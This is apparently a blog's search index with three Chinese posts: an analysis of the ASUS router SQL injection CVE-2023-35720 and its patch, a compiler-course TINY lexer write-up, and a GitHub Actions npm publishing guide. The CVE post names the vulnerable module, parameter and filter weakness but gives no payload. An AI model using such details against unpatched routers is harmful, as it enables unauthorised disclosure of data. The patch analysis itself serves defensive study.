search.xml

<?xml version="1.0" encoding="utf-8"?>
<search>
  <entry>
    <title>CVE-2023-35720 华硕路由器SQL注入漏洞分析</title>
    <url>/posts/CVE-2023-35720-analysis/</url>
    <content><![CDATA[<p>本文对华硕路由器中一个SQL注入漏洞做了简单的分析，希望能对和我一样的小白有所帮助。</p>
<h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>CVE-2023-35720 允许近源攻击者披露受影响的华硕 RT-AX92U 等路由器上的敏感信息。利用此漏洞无需经过鉴权。</p>
<p>该漏洞存在于 mod_webdav.so 模块中。解析请求时，该程序在使用用户提供的字符串构建 SQL 查询语句之前，未正确验证该字符串。攻击者可利用此漏洞在 root 上下文中披露信息。</p>
<h2 id="固件信息"><a href="#固件信息" class="headerlink" title="固件信息"></a>固件信息</h2><ul>
<li><a href="https://dlcdnets.asus.com.cn/pub/ASUS/wireless/RT-AX56U/FW_RT_AX56U_300438651665.zip?model=RT-AX56U">ASUS RT-AX56U 固件版本 3.0.0.4.386.51665（影响最高版本）</a></li>
<li><a href="https://dlcdnets.asus.com.cn/pub/ASUS/wireless/RT-AX56U/FW_RT_AX56U_300438651679.zip?model=RT-AX56U">ASUS RT-AX56U 固件版本 3.0.0.4.386_51679（修复版本）</a></li>
</ul>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p><strong>RT-AX56U</strong> 受影响的最高固件版本为 RT-AX56U 3.0.0.4.386.51665。</p>
<p>分析该版本 mod_webdav.so：</p>
<p><img src="https://bu.dusays.com/2024/08/16/66bf4e8550197.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/16/66bf4e8550197.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="><br>调用<code>array_get_element</code>获取Keyword参数</p>
<p><img src="https://bu.dusays.com/2024/08/16/66bf4f03e3600.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/16/66bf4f03e3600.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="><br>校验了长度和不含<code>'</code>。</p>
<p><img src="https://bu.dusays.com/2024/08/16/66bf4e948d198.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/16/66bf4e948d198.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="><br>替换<code>*</code>为<code>%</code>，替换<code>?</code>为<code>_</code>。</p>
<p><img src="https://bu.dusays.com/2024/08/16/66bf4ea58e214.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/16/66bf4ea58e214.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="><br>根据不同情况，会拼接到不同的查询语句。</p>
<p><img src="https://bu.dusays.com/2024/08/16/66bf4eb2c2a5b.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/16/66bf4eb2c2a5b.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="><br><code>sql_get_table</code>示例用法：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line">sql_get_table(db, <span class="string">"SELECT * FROM sqlite_master where type='table' and name='LiewenMes'"</span>, &amp;dbResult, &amp;nRow, &amp;nColumn, <span class="literal">NULL</span>);</span><br></pre></td></tr></tbody></table></figure>
<p>第二个参数为查询语句<br>该函数在 libbwdpi_sql.so 和 liblightsql.so 中都有定义：</p>
<p><img src="https://bu.dusays.com/2024/08/16/66bf4ebd47dc0.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/16/66bf4ebd47dc0.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></p>
<p>因此程序最后将拼接得到的语句作为查询语句在 sqlite 中执行。</p>
<p>可见漏洞的成因主要是获取用户输入后只进行了简单的过滤就拼接到 SQL 语句执行，造成 SQL 注入。</p>
<h2 id="补丁分析"><a href="#补丁分析" class="headerlink" title="补丁分析"></a>补丁分析</h2><p>修复版本为 RT-AX56U 3.0.0.4.386_51679。</p>
<p>使用 bindiff 比较两个版本的 mod_webdav.so ：</p>
<p><img src="https://bu.dusays.com/2024/08/16/66bf4eca3e572.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/16/66bf4eca3e572.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></p>
<p>发现显著的不同是多了一个<code>is_valid_string</code>函数。</p>
<p><img src="https://bu.dusays.com/2024/08/16/66bf4ed9c253e.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/16/66bf4ed9c253e.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="><br>用这个函数替代了之前对<code>'</code>的校验。</p>
<p>在新版本固件文件系统中寻找该符号：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">$ grep -r <span class="string">'is_valid_string'</span></span><br><span class="line">Binary file usr/sbin/lighttpd matches</span><br><span class="line">Binary file usr/lib/mod_smbdav.so matches</span><br><span class="line">Binary file usr/lib/mod_webdav.so matches</span><br></pre></td></tr></tbody></table></figure>
<p>而旧版本中没有这个符号。<br>在 lighttpd 中发现该函数定义：</p>
<p><img src="https://bu.dusays.com/2024/08/16/66bf4ee64352b.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/16/66bf4ee64352b.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></p>
<p>发现过滤了<code>"</code>, <code>$</code>, <code>`</code> ,<code>;</code>, <code>'</code> 字符。<br>这样的过滤够不够呢……取决于程序实现吧，在mod_webdav.so中用户输入在拼接成SQL语句时基本都用<code>''</code>包裹，没包裹的也是数字。</p>
<p><strong>调用</strong><code>sql_get_table</code>函数的只有mod_webdav.so，因此该固件中应该不再存在<strong>类似成因</strong>的SQL注入漏洞。</p>
<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>之前分析 IoT 漏洞基本专注于命令注入和栈溢出，SQL注入漏洞分析较少，因此写下本文记录。<br>后续有时间可以再<a href="https://www.iotsec-zone.com/article/304">模拟</a>一下华硕路由器，做漏洞的复现。</p>
]]></content>
      <categories>
        <category>IoT安全</category>
      </categories>
      <tags>
        <tag>CVE</tag>
        <tag>ASUS</tag>
        <tag>路由器</tag>
        <tag>nday</tag>
      </tags>
  </entry>
  <entry>
    <title>TINY Scanner开发文档</title>
    <url>/posts/TINY-Scanner/</url>
    <content><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>NIS2336编译原理课程的大(?)作业。<span id="more"></span></p>
<p>代码仓库：</p>
<div class="tag link"><a class="link-card" title="NIS2336_lexical_analysis" href="https://github.com/BeaCox/NIS2336_lexical_analysis"><div class="left"><img src="https://github.githubassets.com/favicons/favicon.svg" class="lazyload" data-srcset="https://github.githubassets.com/favicons/favicon.svg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></div><div class="right"><p class="text">NIS2336_lexical_analysis</p><p class="url">https://github.com/BeaCox/NIS2336_lexical_analysis</p></div></a></div>

<p>要求如下：</p>
<h3 id="前期准备"><a href="#前期准备" class="headerlink" title="前期准备"></a>前期准备</h3><p>了解TINY language语言，并能用TINY language写较简单的程序；<br>掌握词法分析的步骤方法，能根据程序段模拟自动机的分析过程生成token序列。</p>
<h3 id="TINY-language词法分析功能说明"><a href="#TINY-language词法分析功能说明" class="headerlink" title="TINY language词法分析功能说明"></a>TINY language词法分析功能说明</h3><p>TINY language语言的词法单元：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t20250528/202950/18/35758/12997/6474b236F007bf7d3/31aba0e5087ac301.png" data-fancybox="default" data-caption="词法单元"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t20250528/202950/18/35758/12997/6474b236F007bf7d3/31aba0e5087ac301.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t20250528/202950/18/35758/12997/6474b236F007bf7d3/31aba0e5087ac301.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="词法单元"></a><span class="image-caption">词法单元</span></div></div>

<p>  文件global.h中定义了所有的词法单元类型TokenType，并在lexer.h中声明。本次实验要求在读懂lexer.c中已有代码的基础上完善补全lexer.c中的主函数getToken(void)，该函数通过判断当前状态并根据当前读入的词法单元来输出当前读入词法单元的token，并更新状态和词法单元，根据给出代码中的示例补全switch语句中case为其他状态时的情况。</p>
<h3 id="处理结果要求"><a href="#处理结果要求" class="headerlink" title="处理结果要求"></a>处理结果要求</h3><p>给定一段符合TINY language语法的代码，写成.tny文件，放在build\test文件夹内。要求程序能够输出这段代码的每一行，在每一行的后面输出这一行所有词法单元的token。</p>
<p>示例输入和输出如下所示：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">read x</span><br><span class="line"></span><br><span class="line">if 0 &lt; x then </span><br><span class="line"></span><br><span class="line">  fac := 1</span><br><span class="line"></span><br><span class="line">  repeat</span><br><span class="line"></span><br><span class="line">   fact := fact * x</span><br><span class="line"></span><br><span class="line">   x := x – 1 until x = 0</span><br><span class="line"></span><br><span class="line">  write fac</span><br><span class="line"></span><br><span class="line">end</span><br></pre></td></tr></tbody></table></figure>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t20250528/210077/11/35347/15660/6474b26cFbc20fc61/3d0989a21c5b063a.jpg" data-fancybox="default" data-caption="example1"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t20250528/210077/11/35347/15660/6474b26cFbc20fc61/3d0989a21c5b063a.jpg" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t20250528/210077/11/35347/15660/6474b26cFbc20fc61/3d0989a21c5b063a.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="example1"></a><span class="image-caption">example1</span></div><p></p><p></p><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t20250528/119582/34/36885/18294/6474b289F233daf4c/08d352815bc9a362.jpg" data-fancybox="default" data-caption="example2"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t20250528/119582/34/36885/18294/6474b289F233daf4c/08d352815bc9a362.jpg" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t20250528/119582/34/36885/18294/6474b289F233daf4c/08d352815bc9a362.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="example2"></a><span class="image-caption">example2</span></div></div>

<h3 id="提交要求和方法"><a href="#提交要求和方法" class="headerlink" title="提交要求和方法"></a>提交要求和方法</h3><p>  本次实验只对lexer.c进行修改，其他文件不进行修改。在提交时只需将修改完善后的lexer.c上传即可。</p>
<h2 id="DFA"><a href="#DFA" class="headerlink" title="DFA"></a>DFA</h2><div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t20250528/114300/2/39521/24786/6474b260Fae367d1e/3a09aa34620c1b2b.jpg" data-fancybox="default" data-caption="DFA"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t20250528/114300/2/39521/24786/6474b260Fae367d1e/3a09aa34620c1b2b.jpg" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t20250528/114300/2/39521/24786/6474b260Fae367d1e/3a09aa34620c1b2b.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="DFA"></a><span class="image-caption">DFA</span></div></div>

<p>开始状态为<code>START</code>，终止状态为<code>DONE</code>。<br>从<code>START</code>状态转移到下一个状态，只需要判定下一个读入的字符即可。</p>
<h2 id="ERROR"><a href="#ERROR" class="headerlink" title="ERROR"></a>ERROR</h2><p>从图中可以看到，没有将词法错误<code>ERROR</code>单独作为一个状态来参与状态转移。接下来我们考虑发生<code>ERROR</code>的两种情况：</p>
<ol>
<li>读入的第一个字符不是<code>{</code>、数字、字母、<code>:</code>以及TINY允许的运算符，则当前字符发生<code>ERROR</code>。</li>
<li>读入的第一个字符是<code>:</code>，但是第二个字符不是<code>=</code>，则上一个字符(<code>:</code>)发生<code>ERROR</code>。</li>
</ol>
<h3 id="Code"><a href="#Code" class="headerlink" title="Code"></a>Code</h3><p>1. </p>
   <figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line">  <span class="keyword">switch</span> (c)</span><br><span class="line">  {</span><br><span class="line">       ...</span><br><span class="line">       <span class="keyword">default</span>:</span><br><span class="line">         state = DONE;</span><br><span class="line">         currentToken = ERROR;</span><br><span class="line">         <span class="keyword">break</span>;</span><br><span class="line">   }</span><br><span class="line"> }</span><br></pre></td></tr></tbody></table></figure>

<p>   <code>save</code>此时为默认值<code>true</code>，将当前读入的（错误）字符保存以备输出</p>
<p>2. </p>
   <figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">case</span> INASSIGN:</span><br><span class="line">  state = DONE;</span><br><span class="line">  <span class="keyword">if</span> (c == <span class="string">'='</span>)</span><br><span class="line">    currentToken = ASSIGN;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  { <span class="comment">/* backup in the input */</span></span><br><span class="line">    ungetNextChar();</span><br><span class="line">    save = FALSE;</span><br><span class="line">    currentToken = ERROR;</span><br><span class="line">  }</span><br></pre></td></tr></tbody></table></figure>

<p>   若进入<code>INASSIGN</code>后（即读入<code>:</code>后），读入的字符不是<code>=</code>，发生了错误。<br>   调用<code>ungetNextChar()</code>回退一个字符，令该字符参与下一轮的扫描。<br>   <code>save</code>置为<code>false</code>，因为发生错误的是前一个字符<code>:</code>，而不是当前读入的字符。</p>
<h2 id="Lexeme"><a href="#Lexeme" class="headerlink" title="Lexeme"></a>Lexeme</h2><p>从示例图的预期输出以及<code>util.c</code>中的<code>printToken()</code>函数可知：</p>
<p>当词法单元类型为<code>Reserved Words</code>, <code>ID</code>, <code>NUM</code>或<code>ERROR</code>时，需要输出其对应的词素。因此在编写程序时，当遇到这几种词法单元，需要将读入的字符逐个保存，以便在到达<code>DONE</code>状态时输出。</p>
<h3 id="Code-1"><a href="#Code-1" class="headerlink" title="Code"></a>Code</h3><figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">/* lexeme of identifier or reserved word */</span></span><br><span class="line"><span class="type">char</span> tokenString[MAXTOKENLEN + <span class="number">1</span>];</span><br></pre></td></tr></tbody></table></figure>

<p>定义了一个名为<code>tokenString</code>的字符数组，用来保存上述情况下的词素。</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">int</span> tokenStringIndex = <span class="number">0</span>;</span><br></pre></td></tr></tbody></table></figure>

<p>每一轮扫描会将字符数组的索引置零，以便保存新的词素。</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (state == DONE)</span><br><span class="line">{</span><br><span class="line">  tokenString[tokenStringIndex] = <span class="string">'\0'</span>;</span><br><span class="line">  <span class="keyword">if</span> (currentToken == ID)</span><br><span class="line">    currentToken = reservedLookup(tokenString);</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>每一轮扫描结束在字符数组结尾加上终止符<code>\0</code>，因为本轮保存的字符串长度可能小于上一轮保存的字符串长度，这样做可以避免上一轮保存的字符串影响这一轮的输出。</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">/* flag to indicate save to tokenString */</span></span><br><span class="line"><span class="type">int</span> save;</span><br></pre></td></tr></tbody></table></figure>

<p>定义了一个整型变量<code>save</code>（实际当作布尔型用），用来指示当前读入的字符是否需要保存到<code>tokenString</code>。<br>在每一轮循环的开始，即每读入一个新的字符后，<code>save</code>都被置为<code>true</code>，默认要保存该字符。</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ((save) &amp;&amp; (tokenStringIndex &lt;= MAXTOKENLEN))</span><br><span class="line">  tokenString[tokenStringIndex++] = (<span class="type">char</span>)c;</span><br></pre></td></tr></tbody></table></figure>

<p>每一轮循环的尾部，如果<code>save</code>为<code>true</code>，将当前读入的字符保存到<code>tokenString</code>尾部。</p>
<p>实际上，只有进入<code>INID</code>、<code>INNUM</code>、<code>INASSIGN</code>或读入的字符非预期时，才需要保存读入的一串字符。下面我们逐个情况讨论：</p>
<ol>
<li><p>进入<code>INID</code></p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">isalpha</span>(c))</span><br><span class="line">  state = INID;</span><br></pre></td></tr></tbody></table></figure>

<p>从<code>START</code>转移到<code>INID</code>时，仅仅转移状态，<code>save</code>仍为默认值<code>true</code></p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">case</span> INID:</span><br><span class="line">  <span class="keyword">if</span> (!<span class="built_in">isalpha</span>(c))</span><br><span class="line">  { <span class="comment">/* backup in the input */</span></span><br><span class="line">    ungetNextChar();</span><br><span class="line">    save = FALSE;</span><br><span class="line">    state = DONE;</span><br><span class="line">    currentToken = ID;</span><br><span class="line">  }</span><br><span class="line">  <span class="keyword">break</span>;</span><br></pre></td></tr></tbody></table></figure>

<p>进入<code>INID</code>后，当且仅当读入非字母时扫描结束。<br>此时调用<code>ungetNextChar()</code>函数回退一个字符，令该字符参与下一轮的扫描。<br><code>save</code>置为<code>false</code>表示当前读入的字符不是该轮扫描所得词素的一部分。</p>
</li>
<li><p>进入<code>INNUM</code></p>
<p>实现方法与情况1一致</p>
</li>
<li><p>在前文讨论<code>ERROR</code>时已给出</p>
</li>
<li><p>在前文讨论<code>ERROR</code>时已给出</p>
</li>
</ol>
<h2 id="Reserved-Words"><a href="#Reserved-Words" class="headerlink" title="Reserved Words"></a>Reserved Words</h2><p><code>Reserved Words</code>和<code>ID</code>的区别在于：前者由TINY语言预定义，后者由程序员自定义。因此，不严谨地说，<code>Reserved Words</code>也是一种<code>ID</code>。这样，我们可以很自然地将<code>Reserved Words</code>与<code>ID</code>的扫描合并。</p>
<p>具体来说，当读入第一个字符为字母的时候，进入<code>INID</code>状态。在遇到非字母字符时才能转移到<code>DONE</code>状态，在这之前我们都无法确认读入的字符串（即词素）是否是<code>Reserved Words</code>。因此在<code>INID</code>状态期间我们将二者一视同仁，而在转移到<code>DONE</code>状态后对二者进行区分。换句话说，判断读入的词素是否是<code>Reserved Words</code>。</p>
<p>前文说到，当词法单元类型为<code>Reserved Words</code>或<code>ID</code>（亦即进入<code>INID</code>状态）时，我们需要将读入的词素保存。我们在一个包含所有<code>Reserved Words</code>键值对的表进行查找匹配，若保存的词素与表中的词素相同，则返回相应的词法单元，否则表明该词素对应的词法单元为<code>ID</code>。</p>
<h3 id="Code-2"><a href="#Code-2" class="headerlink" title="Code"></a>Code</h3><figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">/* lookup table of reserved words */</span></span><br><span class="line"><span class="type">static</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line">  <span class="type">char</span> *str;</span><br><span class="line">  TokenType tok;</span><br><span class="line">} reservedWords[MAXRESERVED] = {{<span class="string">"if"</span>, IF}, {<span class="string">"then"</span>, THEN}, {<span class="string">"else"</span>, ELSE}, {<span class="string">"end"</span>, END}, {<span class="string">"repeat"</span>, REPEAT}, {<span class="string">"until"</span>, UNTIL}, {<span class="string">"read"</span>, READ}, {<span class="string">"write"</span>, WRITE}};</span><br></pre></td></tr></tbody></table></figure>

<p>定义了一个关键字的字典。</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (state == DONE)</span><br><span class="line">{</span><br><span class="line">  tokenString[tokenStringIndex] = <span class="string">'\0'</span>;</span><br><span class="line">  <span class="keyword">if</span> (currentToken == ID)</span><br><span class="line">    currentToken = reservedLookup(tokenString);</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>当一轮扫描结束时，如果读入的词素被判定为<code>ID</code>（即该轮扫描经过了<code>INID</code>到<code>DONE</code>的状态转移），则在关键字字典中查找该轮保存的词素。如果查找到，返回相应的词法单元类型；如果未找到，返回<code>ID</code>。</p>
]]></content>
      <categories>
        <category>项目</category>
      </categories>
      <tags>
        <tag>编译原理</tag>
      </tags>
  </entry>
  <entry>
    <title>利用GitHub Actions自动发布你的静态资源到npm</title>
    <url>/posts/action-npm/</url>
    <content><![CDATA[<p>苦于GitHub Page和Vercel的本地资源加载速度，我和<a href="https://felixchen0707.cn/">Felix</a>一直在寻找各种静态资源的公共CDN。然而这些资源并不能很好满足我们的需求，因此想到利用npm包在国内的镜像来作为我们所需静态资源的CDN。我们同时想将这些静态资源托管在GitHub并发布到npm，这样一来手动操作就效率极低。<span id="more"></span>懒，也就成了这篇文章的第一驱动力。</p>
<h2 id="注册npm并生成token"><a href="#注册npm并生成token" class="headerlink" title="注册npm并生成token"></a>注册npm并生成token</h2><div class="tag link"><a class="link-card" title="npm注册界面" href="https://www.npmjs.com/signup"><div class="left"><img src="https://static.npmjs.com/7a7ffabbd910fc60161bc04f2cee4160.png" class="lazyload" data-srcset="https://static.npmjs.com/7a7ffabbd910fc60161bc04f2cee4160.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></div><div class="right"><p class="text">npm注册界面</p><p class="url">https://www.npmjs.com/signup</p></div></a></div>

<p>点击链接进入npm注册界面，注册一个账号。</p>
<p>按下图所示生成一个token，并记录下来：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/119908/4/17413/99433/634eaf6bE2aa54a1f/42a001b1b30db4b3.png" data-fancybox="one" data-caption="点击头像，Access Tokens"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/119908/4/17413/99433/634eaf6bE2aa54a1f/42a001b1b30db4b3.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/119908/4/17413/99433/634eaf6bE2aa54a1f/42a001b1b30db4b3.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="点击头像，Access Tokens"></a><span class="image-caption">点击头像，Access Tokens</span></div></div>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/179540/12/29089/56275/634eaf7dEc056852c/cef407d83814a511.png" data-fancybox="one" data-caption="点击Generate New Token"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/179540/12/29089/56275/634eaf7dEc056852c/cef407d83814a511.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/179540/12/29089/56275/634eaf7dEc056852c/cef407d83814a511.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="点击Generate New Token"></a><span class="image-caption">点击Generate New Token</span></div></div>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/130608/21/31527/115174/634eaf98E197ea75c/610c83ebefd8b63e.png" data-fancybox="one" data-caption="填一个备注，选择automation，点击generate"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/130608/21/31527/115174/634eaf98E197ea75c/610c83ebefd8b63e.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/130608/21/31527/115174/634eaf98E197ea75c/610c83ebefd8b63e.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="填一个备注，选择automation，点击generate"></a><span class="image-caption">填一个备注，选择automation，点击generate</span></div></div>
<p>这里一定要选择Automation，否则之后执行Action需要进行验证。</p>
<h2 id="GitHub仓库配置"><a href="#GitHub仓库配置" class="headerlink" title="GitHub仓库配置"></a>GitHub仓库配置</h2><h3 id="新建workflow"><a href="#新建workflow" class="headerlink" title="新建workflow"></a>新建workflow</h3><p>新建一个GitHub仓库，配置自己任意选择即可。<br>新建一个Action：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/127540/3/27271/82134/634eafbaE2db3aaf8/183aa7086d0eb238.png" data-fancybox="one" data-caption="新建workflow"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/127540/3/27271/82134/634eafbaE2db3aaf8/183aa7086d0eb238.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/127540/3/27271/82134/634eafbaE2db3aaf8/183aa7086d0eb238.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="新建workflow"></a><span class="image-caption">新建workflow</span></div></div>
<p>将以下代码复制到这个yml文件当中：</p>
<figure class="highlight yml"><figcaption><span>/.github/workflows/npm-publish.yml</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">Publish</span> <span class="string">to</span> <span class="string">npm</span></span><br><span class="line"></span><br><span class="line"><span class="attr">on:</span></span><br><span class="line">  <span class="attr">push:</span></span><br><span class="line"><span class="comment"># 检测到有push则执行action</span></span><br><span class="line"></span><br><span class="line"><span class="attr">jobs:</span></span><br><span class="line">  <span class="attr">publish-to-npm:</span></span><br><span class="line">    <span class="attr">runs-on:</span> <span class="string">ubuntu-latest</span></span><br><span class="line">    <span class="attr">steps:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Checkout</span> <span class="string">release</span> <span class="string">branch</span> <span class="string">code</span></span><br><span class="line">        <span class="attr">uses:</span> <span class="string">actions/checkout@v3</span></span><br><span class="line"></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Use</span> <span class="string">Node.js</span></span><br><span class="line">        <span class="attr">uses:</span> <span class="string">actions/setup-node@master</span></span><br><span class="line">        <span class="attr">with:</span></span><br><span class="line">          <span class="attr">node-version:</span> <span class="string">${{</span> <span class="string">matrix.node-version</span> <span class="string">}}</span></span><br><span class="line">          <span class="attr">registry-url:</span> <span class="string">https://registry.npmjs.org</span></span><br><span class="line"></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Publish</span> <span class="string">to</span> <span class="string">NPM</span></span><br><span class="line">        <span class="attr">run:</span> <span class="string">npm</span> <span class="string">publish</span> <span class="string">||</span> <span class="literal">true</span></span><br><span class="line">        <span class="attr">env:</span></span><br><span class="line">          <span class="attr">NODE_AUTH_TOKEN:</span> <span class="string">${{</span> <span class="string">secrets.NPM_TOKEN</span> <span class="string">}}</span></span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>

<p>点击<code>start commit</code></p>
